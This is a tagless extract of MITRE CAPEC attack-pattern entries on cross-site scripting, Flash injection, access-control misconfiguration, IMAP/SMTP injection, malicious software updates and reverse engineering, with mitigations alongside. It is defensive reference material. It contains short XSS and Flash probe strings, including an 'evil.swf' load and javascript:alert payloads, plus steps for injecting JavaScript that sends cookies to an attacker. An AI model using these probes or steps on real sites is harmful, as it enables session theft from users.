Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Probe identified potential entry points for XSS vulnerability
The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.
Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.).
env-Web
Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.).
env-Web
Use a proxy tool to record results of the created requests.
env-Web
User-controllable input is output back to the browser
env-Web
Output to the browser is not encoded to remove executable scripting syntax.
env-Web
The attacker's script string is being reflected verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, etc.)
All context-sensitive characters are consistently re-encoded before being sent to the web browser. For example, in a HTML tag element, the payload may not be able to evade the quotes in order to inject another attribute.
Some sensitive characters are consistently encoded, but others are not. Depending on which type of non-script element the payload is injected in, it may be possible to evade the encodings.
Monitor input to web servers (not only GET, but all potential inputs like COOKIES, POST, HEADER), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Steal session IDs, credentials, page content, etc.
As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
env-Web
The attacker gets the user's cookies or other session identifiers.
The attacker gets the content of the page the user is viewing.
The attacker causes the user's browser to visit a page with malicious content.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Forceful browsing
When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
env-Web
The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF.
The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Content spoofing
By manipulating the content, the attacker targets the information that the user would like to get from the website.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
env-Web
The user sees a page containing wrong information
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Target client software must be a client that allows script execution based on scripts generated by remote hosts.
Very High
High
Injection
API Abuse
In this example, the attacker adds script to HTML tags other than <script> tags, when the victim's standard content is appended with a malicious script. For example a link to http://myfavoritewebsite/getMyHomePage/content?maliciousscript.js
The victim clicks on the link, which directs them to their home page (so that the victim does not notice anything is amiss) and simultaneously executes a script on their machine.
Low
To achieve a redirection and use of less trusted source, an attacker can simply edit content such as XML payload or HTML files that are sent to client machine.
High
Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.
Ability to include malicious script in document, e.g. HTML file, or XML document. Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine
Design: Use browser technologies that do not allow client side scripting.
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Perform input validation for all remote content.
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in browser
Implementation: Session tokens for specific host
Implementation: Service provider should not use the XMLHttpRequest method to create a local proxy for content from other sites, because the client will not be able to discern what content comes from which host.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read application data
Malicious input delivered through standard document formats, e.g. XML document or HTML file to the client.
Varies with instantiation of attack pattern. In the case of HTML files they may not be visible to the end user via a browser.
Client software and its component libraries
Enables attacker to execute scripts to launch attacks on remote client machine and environment
79
Targeted
80
Targeted
83
Targeted
84
Secondary
82
Targeted
348
Targeted
96
Targeted
20
Targeted
116
Targeted
184
Secondary
86
Secondary
350
Targeted
692
Targeted
697
Targeted
713
Targeted
71
Targeted
1000
Attack Pattern
ChildOf
63
1000
Attack Pattern
ChildOf
242
333
Category
HasMember
341
Penetration
Medium
Medium
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack. Most commonly, attackers would take advantage of controls that provided too little protection for sensitive activities in order to perform actions that should be denied to them. In some circumstances, an attacker may be able to take advantage of overly restrictive access control policies, initiating denial of services (if an application locks because it unexpectedly failed to be granted access) or causing other legitimate actions to fail due to security. The latter class of attacks, however, is usually less severe and easier to detect than attacks based on inadequate security restrictions. This attack pattern differs from CAPEC 1, "Accessing Functionality Not Properly Constrained by ACLs" in that the latter describes attacks where sensitive functionality lacks access controls, where, in this pattern, the access control is present, but incorrectly configured.
Survey
The attacker surveys the target application, possibly as a valid and authenticated user.
Spider the web site for all available links.
env-Web
Brute force to guess all function names/action with different privileges.
env-Web
Access control mechanism is present in the system.
env-Web
Operating modes with different privileges are present in the system.
env-Web
The attacker gets a list of functionality and data that can be accessed through the system.
Correctly configure access control policy.
Identify weak points in access control configurations
The attacker probes the access control for functions and data identified in the Explore phase to identify potential weaknesses in how the access controls are configured.
The attacker attempts authenticated access to targeted functions and data.
env-All
The attacker attempts unauthenticated access to targeted functions and data.
env-All
The attacker attempts indirect and side channel access to targeted functions and data.
env-All
Access the function or data bypassing the access control
The attacker executes the function or accesses the data identified in the Explore phase bypassing the access control.
The attacker executes the function or accesses the data not authorized to him.
env-All
Functionality is accessible to unauthorized users.
Configure the access control correctly.
The target must apply access controls, but incorrectly configure them. However, not all incorrect configurations can be exploited by an attacker. If the incorrect configuration applies too little security to some functionality, then the attacker may be able to exploit it if the access control would be the only thing preventing an attacker's access and it no longer does so. If the incorrect configuration applies too much security, it must prevent legitimate activity and the attacker must be able to force others to require this activity..
Medium
High
Analysis
Brute Force
For example, an incorrectly configured Web server, may allow unauthorized access to it, thus threaten the security of the Web application.
Low
In order to discover unrestricted resources, the attacker does not need special tools or skills. He only has to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly.
No special resources are required for this attack.
Design: Configure the access control correctly.
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read memory
Integrity
Modify memory
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Authorization
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
Availability
DoS: crash / exit / restart
DoS: instability
732
Targeted
1000
Attack Pattern
ChildOf
122
http://capec.mitre.org/data/definitions/122.html
Penetration
High
High
High
All
All
All
All
Silvio Cesare
Share Library Call Redirection Via ELF PLT Infection
Issue 56
Phrack Magazine
2000
http://www.phrack.org/issues.html?issue=56&id=7
OWASP Top 10
OWASP Top 10 2007 – Malicious File Execution
2007
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Top_10_2007-A3
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes.
The victim must be tricked into navigating to the attackers' decoy site and performing the actions on the decoy page.
The victim's browser must support invisible Flash overlays.
Medium
The attacker must be able to force the Flash overlay over the decoy content.
1000
Attack Pattern
ChildOf
103
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.
Find Injection Entry Points
The attacker first takes an inventory of the entry points of the application.
Spider the website for all available URLs that reference a Flash application.
env-Web
List all uninitialized global variables (such as _root.*, _global.*, _level0.*) in ActionScript, registered global variables in included files, load variables to external movies.
env-Web
The application has embedded Flash movies.
env-Web
The application does not have embedded Flash movies.
env-Web
A list of URLs which has embedded Flash movies and the list of global uninitialized global variables, load variables to external movies.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Determine the application's susceptibility to Flash injection
Determine the application's susceptibility to Flash injection. For each URL identified in the explore phase, the attacker attempts to use various techniques such as direct load asfunction, controlled evil page/host, Flash HTML injection, and DOM injection to determine whether the application is susceptible to Flash injection.
Test the page using direct load asfunction, getURL,javascript:gotRoot("")///d.jpg
env-Web
Test the page using controlled evil page/host, http://example.com/evil.swf
env-Web
Test the page using Flash HTML injection, "'><img src='asfunction:getURL,javascript:gotRoot("")//.jpg' >
env-Web
Test the page using DOM injection, (gotRoot(''))
env-Web
Find at least one URL is susceptible to Flash injection.
No URL is susceptible to injection found.
Perform input validation on both the client side and the server side.
Inject malicious content into target
Inject malicious content into target utilizing vulnerable injection vectors identified in the Experiment phase
The target must be capable of running Flash applications. In some cases, the victim must follow an attacker-supplied link.
Medium
High
Injection
In the following example, the SWF file contains
getURL('javascript:SomeFunc("someValue")','','GET')
A request like
http://example.com/noundef.swf?a=0:0;alert('XSS')
becomes
javascript:SomeFunc("someValue")?a=0:0;alert(123)
Medium
The attacker may need to be able to serve the injected Flash content, but otherwise no special resources are required.
Implementation: remove sensitive information such as user name and password in the SWF file.
Implementation: use validation on both client and server side.
Implementation: remove debug information.
Implementation: use SSL when loading external data
Implementation: use crossdomain.xml file to allow the application domain to load stuff or the SWF file called by other domain.
Confidentiality
"Varies by context"
Information Leakage
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read memory
Integrity
Modify memory
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
URL, the objects in the SWF file, script in the Web browser.
The crafted value injected to the URL or other objects in the SWF file.
The application environment where the Flash runs.
The injection can allow the attacker to get sensitive information, escalate privilege, execute commands and cross-site scripting using Flash etc.
20
Targeted
184
Targeted
697
Targeted
1000
Attack Pattern
ChildOf
248
1000
Attack Pattern
CanAlsoBe
137
http://capec.mitre.org/data/definitions/137.html
Penetration
Exploitation
High
Medium
Low
Client-Server
n-Tier
All
All
All
Stefano Di Paola
Finding Vulnerabilities in Flash Applications
OWASP Appsec 2007
November 15, 2007
Rudra K. Sinha Roy
A Lazy Pen Tester's Guide to Testing Flash Applications
iViz
http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen-tester-guide/
Peleus Uhley
Creating More Secure SWF Web Application
Adobe Systems Incorporated
http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits weaknesses in input validation on IMAP/SMTP servers to execute commands on the server. Web-mail servers often sit between the Internet and the IMAP or SMTP mail server. User requests are received by the web-mail servers which then query the back-end mail server for the requested information and return this response to the user. In an IMAP/SMTP command injection attack, mail-server commands are embedded in parts of the request sent to the web-mail server. If the web-mail server fails to adequately sanitize these requests, these commands are then sent to the back-end mail server when it is queried by the web-mail server, where the commands are then executed. This attack can be especially dangerous since administrators may assume that the back-end server is protected against direct Internet access and therefore may not secure it adequately against the execution of malicious commands.
The target environment must consist of a web-mail server that the attacker can query and a back-end mail server. The back-end mail server need not be directly accessible to the attacker.
The web-mail server must fail to adequately sanitize fields received from users and passed on to the back-end mail server.
The back-end mail server must not be adequately secured against receiving malicious commands from the web-mail server.
Medium
No special resources are required for this attack. However, in most cases, the attacker will need to be a recognized user of the web-mail server.
1000
Attack Pattern
ChildOf
248
OWASP Testing Guide
Testing for IMAP/SMTP Injection (OWASP-DV-011)
v4 [DRAFT]
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Testing_for_IMAP/SMTP_Injection_(OWASP-DV-011)
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker initiates a series of events designed to cause a user, program, server, or device to perform actions which undermine the integrity of software code, device data structures, or device firmware, achieving the modification of the target's integrity to achieve an insecure state.
Low
Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code.
Software Integrity Attacks are usually a late stage focus of attack activity which depends upon the success of a chain of prior events. The resources required to perform the attack vary with respect to the overall attack strategy, existing countermeasures which must be bypassed, and the success of early phase attack vectors.
494
Targeted
1000
Category
ChildOf
526
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.
Very High
494
Targeted
1000
Attack Pattern
ChildOf
184
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code believed to be a valid update that originates from an attacker controlled source. Although there are several variations to this strategy of attack, the attack methods are united in that all rely on the ability of an attacker to position and disguise malicious content such that it masquerades as a legitimate software update which is then processed by a program, undermining application integrity. As such the attack employs 'spoofing' techniques augmented by psychological or technological mechanisms to disguise the update and/or its source.
Virtually all software requires frequent updates or patches, giving the attacker immense latitude when structuring the attack, as well as many targets of opportunity. Attacks involving malicious software updates can be targeted or untargeted in reference to a population of users, and can also involve manual and automatic means of payload installation. Untargeted attacks rely upon a mass delivery system such as spamming, phishing, or trojans/botnets to distribute emails or other messages to vast populations of users.
Targeted attacks aim at a particular demographic or user population. Manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user on clicking a single url. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. Thus the attacker has in his or her arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML messaging within the user interface.
Corporate Facebook or Myspace pages make it easy to target users of a specific company or affiliation without relying on email address harvesting or spamming. One phishing-assisted variation on this attack involves hosting what appears to be a software update, then harvesting actual email addresses for an organization, or generating commonly used email addresses, and then sending spam, phishing, or spear-phishing emails to the organization's users requesting that they manually download and install the malicious software update. This type of attack has also been conducted using an Instant Messaging virus payload, which harvests the names from a user's contact list and sends instant messages to those users to download and apply the update. While both methods involve a high degree of automated mechanisms to support the attack, the primary vector for achieving the installation of the update remains a manual user-directed process, although clicking a link within an IM client or web application may initiate the update.
Manual attacks of this nature are common and frequently supported by social networking sites, such as Myspace or Facebook, and have proven to be immensely successful. Automated attacks involving malicious software updates require little to no user-directed activity and are therefore advantageous because they avoid the complex preliminary setup stages of manual attacks, which must effectively 'hook' users while avoiding countermeasures such as spam filters or web security filters.
Automated update mechanisms typically come in two kinds, each requiring different mechanics for exploitation. 'Pull' mechanisms retrieve periodic updates from a server, a process in which the client software or local server installation retrieves the update from a remote network source. While 'Pull' mechanisms are highly automated there is still some user directed activity involved in the update process. 'Push' mechanisms involve a remote server sending an update to a client, which is typically processed when it is received. A characteristic of 'Push' updates is that they typically involve the least user interaction within the update process, thus narrowing the scope of the attack to automated mechanisms. Automated update attacks typically exploit a lack of technical mechanisms to validate the integrity of code before it is downloaded.
Low
Manual or user-assisted attacks require deceptive mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code.
494
Targeted
1000
Attack Pattern
ChildOf
184
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a weakness in a server or client's process of delivering and verifying the integrity of code supplied by an update-providing server or mechanism to cause code of the attackers' choosing to be downloaded and installed as a software update. Attacks against automated update mechanisms involve attack vectors which are specific to the type of update mechanism, but typically involve two different attack strategies: redirection or spoofing. Redirection-based attacks exploit two layers of weaknesses in server or client software to undermine the integrity of the target code-base.
The first weakness involves a failure to properly authenticate a server as a source of update or patch content. This type of weakness typically results from authentication mechanisms which can be defeated, allowing a hostile server to satisfy the criteria that establish a trust relationship. The second weakness is a systemic failure to validate the identity and integrity of code downloaded from a remote location, hence the inability to distinguish malicious code from a legitimate update.
One predominate type of redirection attack requires DNS spoofing or hijacking of a domain name corresponding to an update server. The target software initiates an update request and the DNS request resolves the domain name of the update server to the IP address of the attacker, at which point the software accepts updates either transmitted by or pulled from the attackers' server. Attacks against DNS mechanisms comprise an initial phase of a chain of attacks that facilitate automated update hijacking attack, and such attacks have a precedent in targeted activities that have been as complex as DNS/BIND attacks of corporate infrastructures, to untargeted attacks aimed at compromising home broadband routers, as well as attacks involving the compromise of wireless access points, as well as 'evil twin' attacks coupled with DNS redirection. Due to the plethora of options open to the attacker in forcing name resolution to arbitrary servers the Automated Update Hijacking attack strategies are the tip of the spear for many multi-stage attack chains.
The second weakness that is exploited by the attacker is the lack of integrity checking by the software in validating the update. Software which relies only upon domain name resolution to establish the identity of update code is particularly vulnerable, because this signals an absence of other security countermeasures that could be applied to invalidate the attackers' payload on basis of code identity, hashing, signing, encryption, and other integrity checking mechanisms. Redirection-based attack patterns work equally well against client-side software as well as local servers or daemons that provide software update functionality. One precedent of redirection-based attacks involves the active exploitation of Firefox extensions, such as the Google Toolbar, Yahoo Toolbar, Facebook Toolbar, and others.
The second strategy employed in Automated Hijacking Attacks are spoofing strategies, including content or identity spoofing, as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers' server. Such attacks have numerous precedents, one in particular being eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers' code without integrity checking.
High
494
Targeted
1000
Attack Pattern
ChildOf
186
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker discovers the structure, function, and composition of an object, resource, or system by using a variety of analysis techniques to effectively determine how the analyzed entity was constructed or operates. The goal of reverse engineering is often to duplicate the function, or a part of the function, of an object in order to duplicate or "back engineer" some aspect of its functioning. Reverse engineering techniques can be applied to mechanical objects, electronic devices or components, or to software, although the methodology and techniques involved in each type of analysis differ widely.
Low
Access to or control of an object, resource, or system, to be analyzed. The technical resources required to engage in reverse engineering differ in accordance with the type of object, resource, or system being analyzed.
798
Targeted
259
Secondary
1000
Category
ChildOf
281
Wikipedia
Reverse engineering
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Reverse_engineering
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker discovers the structure, function, and composition of a type of computer software by using a variety of analysis techniques to effectively determine how the software functions and operates, or if vulnerabilities or security weakness are present within the implementation. Reverse engineering methods, as applied to software, can utilize a wide number approaches and techniques.
Methodologies for software reverse engineering fall into two broad categories, 'white box' and 'black box.' White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution. 'Black Box' methods involve interacting with the software indirectly, in the absence of the ability to measure, instrument, or analyze an executable object directly. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs.
Low
Reverse engineering of software requires varying tools and methods depending upon whether an executable or other compiled object is present directly for analysis by tools capable of decompiling or monitoring its execution within an operating environment, as in the case of white box methods. Black box methods require (at minimum) the ability to interact with the functional boundaries where the software communicates with a larger processing environment, such as inter-process communication on a host operating system, or via networking protocols.
798
Targeted
259
Secondary
1000
Attack Pattern
ChildOf
188
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts. The attacker leverages this capability to execute scripts to execute his/her own script by embedding it within other scripts that the target software is likely to execute. The attacker must have the ability to inject script into script that is likely to be executed. If this is done, then the attacker can potentially launch a variety of probes and attacks against the web server's local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts.
With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an attacker can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host.
Of course, these attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well. In general all that is required is for there to be sufficient privileges to execute a script, but not protected against writing.
Spider
Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side script element. These script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc.
Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application.
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
Inputs are used in a script element (script tag, DOM, etc.) and not in another type of element.
env-Web
Using URL rewriting, parameters may be part of the URL path or the URL fragment.
env-Web
No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker. These parameters are possibly used in client-side scripts elements.
A list of application user interface entry fields is created by the attacker.
A list of resources accessed by the application is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Probe identified potential entry points for XSS vulnerability
The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.
Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.
env-Web
Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.
env-Web
Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.
env-Web
Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.
env-Web
Use a proxy tool to record results of the created requests.
env-Web
User-controllable input is output back to the browser
env-Web
User-controllable input is embedded as part of script elements
env-Web
Output to the browser is not encoded to remove executable scripting syntax
env-Web
Server-side components execute script elements containing user-controllable input
env-Web
The attacker's script string is being reflected verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, etc.)
The attacker's script string is executed by the server-side component.
All context-sensitive characters are consistently re-encoded before being sent to the web browser.
Some sensitive characters are consistently encoded, but others are not. Depending on which type of non-script element the payload is injected in, it may be possible to evade the encodings.
Monitor input to web servers (not only GET, but all potential inputs like COOKIES, POST, HEADER), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Do not embed user-controllable input in script elements.
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Steal session IDs, credentials, page content, etc.
As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
env-Web
The attacker gets the user's cookies or other session identifiers.
The attacker gets the content of the page the user is viewing.
The attacker causes the user's browser to visit a page with malicious content.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Forceful browsing
When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
env-Web
The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF.
The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Content spoofing
By manipulating the content, the attacker targets the information that the user would like to get from the website.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
env-Web
The user sees a page containing wrong information
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Target software must be able to execute scripts, and also allow attacker to write/upload script
High
High
Injection
API Abuse
Ajax applications enable rich functionality for browser based web applications. Applications like Google Maps deliver unprecedented ability to zoom in and out, scroll graphics, and change graphic presentation through Ajax. The security issues that an attacker may exploit in this instance are the relative lack of security features in JavaScript and the various browser's implementation of JavaScript, these security gaps are what XSS and a host of other client side vulnerabilities are based on. While Ajax may not open up new security holes, per se, due to the conversational aspects between client and server of Ajax communication, attacks can be optimized. A single zoom in or zoom out on a graphic in an Ajax application may round trip to the server dozens of times. One of the first steps many attackers take is frequently footprinting an environment, this can include scanning local addresses like 192.*.*.* IP addresses, checking local directories, files, and settings for known vulnerabilities, and so on.
<IMG SRC=javascript:alert('XSS')>
The XSS script that is embedded in a given IMG tag can be manipulated to probe a different address on every click of the mouse or other motions that the Ajax application is aware of.
In addition the enumerations allow for the attacker to nest sequential logic in the attacks. While Ajax applications do not open up brand new attack vectors, the existing attack vectors are more than adequate to execute attacks, and now these attacks can be optimized to sequentially execute and enumerate host environments.
Low
To load malicious script into open, e.g. world writable directory
Medium
Executing remote scripts on host and collecting output
Ability to deploy a custom script on host
Design: Use browser technologies that do not allow client side scripting.
Design: Utilize strict type, character, and encoding enforcement
Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Perform input validation for all remote content.
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in browser
Implementation: Session tokens for specific host
Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.
Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
